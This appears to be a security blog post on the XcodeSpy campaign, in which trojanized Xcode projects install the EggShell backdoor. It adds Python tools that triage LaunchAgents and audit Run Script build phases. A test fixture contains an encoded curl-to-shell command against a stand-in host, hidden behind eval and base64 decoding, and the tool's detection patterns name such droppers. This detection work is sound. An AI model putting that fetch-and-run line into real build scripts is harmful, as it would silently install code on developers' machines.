Saturday, June 12, 2021

Apple developers targeted by EggShell Backdoor


Malicious Xcode projects are being used to hijack developer systems and distribute custom EggShell backdoors.

The malware, dubbed XcodeSpy, targets Xcode, the integrated development environment (IDE) that Apple developers use on macOS to build software for Apple platforms.

According to research published by SentinelLabs on Thursday, the IDE's Run Script feature is being abused in attacks aimed at iOS developers, delivered through Trojanized Xcode projects shared freely online.

Legitimate open-source Xcode projects are commonly shared on GitHub. In this case, the XcodeSpy project advertises "advanced features" for the iOS tab bar, and once the project has been downloaded and built, a malicious script runs and installs the EggShell backdoor.

The malicious project examined by the researchers is a doctored copy of TabBarInteraction, a legitimate project that was not itself compromised.

An obfuscated Run Script inserted into the project executes silently and connects the developer's machine to the attackers' command-and-control (C2) server.

The abused feature is a legitimate Xcode capability: a Run Script build phase lets a project execute an arbitrary custom shell script when the developer's build target is launched.

The script then retrieves a custom variant of the EggShell backdoor from the C2 and installs it, setting up persistence through a user LaunchAgent.
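The persistence step above is the one a responder can look for on a suspected developer machine. The following is an added example, not code from the page, from SentinelLabs or from EggShell, and not a signature for it: it parses user LaunchAgent property lists with Python's plistlib and scores generic red flags (auto-start and restart keys, programs in hidden or user-writable locations, an interpreter launched with an inline command, and an Apple-style label pointing at a non-Apple program). The two sample plists, the label com.apple.updates.helper, the ~/Library/.cache/.helper path and the scoring weights are constructed assumptions for the demo.

```python
"""Triage user LaunchAgents for backdoor-style persistence (added example)."""
import plistlib
from pathlib import Path
from typing import Dict, List

HOME = str(Path.home())

# Constructed: a vendor agent that periodically runs a binary inside its app bundle.
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.updater",
    "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
    "StartInterval": 3600,
})

# Constructed: the shape a dropped implant often takes. The label mimics Apple naming,
# the program hides in a dot-directory under the home folder, it starts at login,
# launchd restarts it if killed, and it is run through an interpreter with -c.
SUSPICIOUS_PLIST = plistlib.dumps({
    "Label": "com.apple.updates.helper",
    "ProgramArguments": ["/bin/sh", "-c", "~/Library/.cache/.helper >/dev/null 2>&1"],
    "RunAtLoad": True,
    "KeepAlive": True,
})

INTERPRETERS = {"sh", "bash", "zsh", "python", "python3", "perl", "ruby", "osascript"}
TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/Shared/")
APPLE_DIRS = ("/System/", "/usr/bin/", "/usr/sbin/", "/usr/libexec/", "/Library/Apple/")
# Weights and threshold are assumptions for the demo; tune them for your fleet.
WEIGHTS = {
    "RunAtLoad": 1,
    "KeepAlive": 1,
    "interpreter with inline script": 2,
    "hidden path component": 2,
    "temp or shared location": 2,
    "program under user home": 1,
    "Apple-style label, non-Apple program": 2,
}
THRESHOLD = 3


def _program_args(plist: Dict) -> List[str]:
    args = plist.get("ProgramArguments") or ([plist["Program"]] if plist.get("Program") else [])
    return [str(a) for a in args]


def _paths(args: List[str]) -> List[str]:
    """Every whitespace-separated token containing a slash, shell redirects stripped."""
    return [t.lstrip("<>|&;") for a in args for t in a.split() if "/" in t]


def score_agent(plist: Dict) -> Dict:
    """Apply the heuristics to one parsed launchd plist and return findings and score."""
    args = _program_args(plist)
    found: List[str] = []

    def flag(name: str) -> None:
        if name not in found:
            found.append(name)

    for key in ("RunAtLoad", "KeepAlive"):
        if plist.get(key):
            flag(key)
    exe = args[0].rsplit("/", 1)[-1] if args else ""
    if exe in INTERPRETERS and any(a in ("-c", "-e") for a in args[1:]):
        flag("interpreter with inline script")
    for p in _paths(args):
        if any(seg.startswith(".") and seg not in (".", "..") for seg in p.split("/")):
            flag("hidden path component")
        if p.startswith(TEMP_DIRS):
            flag("temp or shared location")
        if p.startswith("~") or p.startswith(HOME + "/"):
            flag("program under user home")
    label = str(plist.get("Label", ""))
    if label.startswith("com.apple.") and args and not args[0].startswith(APPLE_DIRS):
        flag("Apple-style label, non-Apple program")
    score = sum(WEIGHTS[f] for f in found)
    return {"label": label, "program": " ".join(args), "findings": found,
            "score": score, "suspicious": score >= THRESHOLD}


def analyze(plist_bytes: bytes) -> Dict:
    """Score a single plist given as bytes (XML or binary format)."""
    return score_agent(plistlib.loads(plist_bytes))


def audit_directory(directory: Path = Path.home() / "Library" / "LaunchAgents") -> List[Dict]:
    """Score every .plist in a LaunchAgents folder; unparseable files are reported too."""
    results = []
    for f in sorted(directory.glob("*.plist")):
        try:
            r = analyze(f.read_bytes())
        except Exception as exc:  # a plist launchd cannot load is still worth a look
            r = {"label": "?", "program": "", "findings": [f"unparseable: {exc}"],
                 "score": 1, "suspicious": False}
        r["file"] = str(f)
        results.append(r)
    return results


if __name__ == "__main__":
    for sample in (BENIGN_PLIST, SUSPICIOUS_PLIST):
        r = analyze(sample)
        print(f"{'SUSPICIOUS' if r['suspicious'] else 'ok':10} {r['label']}: {r['program']}")
        for f in r["findings"]:
            print("   -", f, f"(+{WEIGHTS[f]})")
    # On a real host: for r in audit_directory(): print(r["file"], r["score"], r["findings"])
```

The heuristics are deliberately generic, since the page does not describe the EggShell LaunchAgent itself; the score is a triage aid, not a verdict, and anything it flags should be confirmed by inspecting the referenced binary and its signature.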

Two variants of EggShell have been identified, one of which shares an encrypted string with XcodeSpy.

The backdoor can record from the victim developer's microphone and camera, log keystrokes, and upload files to the attackers' C2.

SentinelLabs says at least one US organization was hit in the campaign, and developers in Asia are also likely to have been targeted. The campaign ran at least between July and October 2020.

Backdoor samples were uploaded to VirusTotal on August 5 and October 13. The XcodeSpy project sample was first uploaded on September 4, although the researchers suspect the attacker may have submitted it themselves to test detection rates.

“While XcodeSpy seems to be targeted at developers themselves rather than products or developers’ clients, it is a short step away from redirecting the developer’s workplace to deliver malware to users of that developer’s software,” the researchers said. “As a result, all Apple developers are cautioned to check for any serious Run scripts whenever Xcode projects from third parties are approved.”
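The advice above to inspect Run Scripts can be automated. A Run Script build phase is stored inside the project's project.pbxproj file as a PBXShellScriptBuildPhase object whose shellScript string holds the command Xcode will execute. The script below is an added example, not code from the page or from SentinelLabs: it extracts every such phase, flags patterns that are common in droppers but rare in honest build scripts (eval, base64 decoding, downloads piped to a shell, long encoded blobs), and decodes base64 blobs one layer deep to show what they hide. The sample pbxproj fragment, its object IDs and the encoded curl-to-shell payload pointing at the reserved domain example.invalid are constructed for the demo.

```python
"""Audit the Run Script build phases of an Xcode project (added example).

Usage: python audit_run_scripts.py path/to/MyApp.xcodeproj/project.pbxproj
With no argument it runs against the constructed sample below.
"""
import base64
import re
import sys
from typing import Dict, List

# Constructed payload: a curl-to-shell one-liner against the reserved, non-resolving
# domain example.invalid, encoded so the sample project carries a realistic blob.
ENCODED_PAYLOAD = base64.b64encode(b"curl -s http://example.invalid/p | sh").decode()

# Constructed project.pbxproj fragment: one benign phase (a linter) and one that
# decodes and evals a hidden command. Strings use pbxproj escaping (\" and \n).
_TEMPLATE = r'''
/* Begin PBXShellScriptBuildPhase section */
        A1B2C3D4 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            name = "SwiftLint";
            shellPath = /bin/sh;
            shellScript = "if which swiftlint >/dev/null; then swiftlint; fi\n";
        };
        E5F6A7B8 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            buildActionMask = 2147483647;
            files = (
            );
            shellPath = /bin/sh;
            shellScript = "eval \"$(echo __BLOB__ | base64 -d)\" >/dev/null 2>&1 &\n";
        };
/* End PBXShellScriptBuildPhase section */
'''
SAMPLE_PBXPROJ = _TEMPLATE.replace("__BLOB__", ENCODED_PAYLOAD)

# Patterns that are rare in honest build scripts but common in droppers.
INDICATORS = [
    ("eval of dynamic string", re.compile(r"\beval\b")),
    ("base64 decode", re.compile(r"\bbase64\b[^\n|]*(?:-d\b|-D\b|--decode)")),
    ("download piped to interpreter",
     re.compile(r"\b(?:curl|wget)\b[^\n]*\|\s*(?:sh|bash|zsh|python3?|perl|osascript)\b")),
    ("osascript execution", re.compile(r"\bosascript\b")),
    ("hex/openssl decode", re.compile(r"\bxxd\s+-r\b|\bopenssl\s+enc\b[^\n]*\s-d\b")),
    ("long base64-like blob", re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")),
]
_BLOB = INDICATORS[-1][1]
# One object of the old-style plist: ID /* label */ = { ... };
_OBJECT = re.compile(r"(\w+)\s*/\*\s*(.*?)\s*\*/\s*=\s*\{(.*?)\n\s*\};", re.S)
_SCRIPT = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;', re.S)
_NAME = re.compile(r'\bname\s*=\s*"?([^";]*)"?\s*;')
_SHELL = re.compile(r'shellPath\s*=\s*"?([^";]+)"?\s*;')
_ESCAPES = {"n": "\n", "t": "\t"}


def _unescape(s: str) -> str:
    # Undo pbxproj escaping: \n, \t, \" and \\ inside the quoted shellScript value.
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), s)


def decode_blobs(script: str) -> List[str]:
    """Decode long base64 tokens that turn into printable text (one layer only)."""
    out = []
    for tok in _BLOB.findall(script):
        try:
            txt = base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\n\t\r" for c in txt):
            out.append(txt)
    return out


def audit_pbxproj(text: str) -> List[Dict]:
    """Return one record per PBXShellScriptBuildPhase with its indicators."""
    start = text.find("/* Begin PBXShellScriptBuildPhase section */")
    end = text.find("/* End PBXShellScriptBuildPhase section */")
    section = text[start:end] if start != -1 and end != -1 else text
    phases = []
    for obj_id, label, body in _OBJECT.findall(section):
        if "isa = PBXShellScriptBuildPhase" not in body:
            continue
        m = _SCRIPT.search(body)
        script = _unescape(m.group(1)) if m else ""
        head = _SCRIPT.sub("", body)  # look up name/shellPath outside the script text
        name, shell = _NAME.search(head), _SHELL.search(head)
        decoded = decode_blobs(script)
        flags = [lbl for lbl, rx in INDICATORS if rx.search(script)]
        for txt in decoded:
            flags += [lbl + " (in decoded blob)" for lbl, rx in INDICATORS if rx.search(txt)]
        phases.append({"id": obj_id, "name": name.group(1) if name else label,
                       "shell": shell.group(1) if shell else "/bin/sh",
                       "script": script, "decoded": decoded, "indicators": flags})
    return phases


def suspicious_phases(text: str) -> List[Dict]:
    return [p for p in audit_pbxproj(text) if p["indicators"]]


if __name__ == "__main__":
    pbx = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for p in audit_pbxproj(pbx):
        print(f"[{'SUSPICIOUS' if p['indicators'] else 'ok'}] {p['id']} {p['name']} ({p['shell']})")
        print("   script :", p["script"].strip())
        for line in p["decoded"] + p["indicators"]:
            print("   ->", line)
```

Run it against the project.pbxproj of any third-party project before opening it in Xcode, because the Run Script phase fires on the first build, and read every script it prints in full rather than trusting the flags alone: a phase that simply invokes a second script file checked into the repository passes the regexes but still executes whatever that file contains.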

Back in August 2020, Trend Micro documented the XCSSET malware, which also spreads through Xcode projects and was observed hijacking Safari browser sessions to steal sensitive identity data, inject cross-site scripting (XSS) payloads, and exfiltrate developer data.

The Trend Micro team said the discovery eventually led them down "a rabbit hole for malicious payloads."

Priyanshu Vijayvargiya
Priyanshu Vijayvargiya, founder and editor-in-chief of Virtualattacks Inc, is a cybersecurity analyst, information security professional, developer, and white hat hacker.

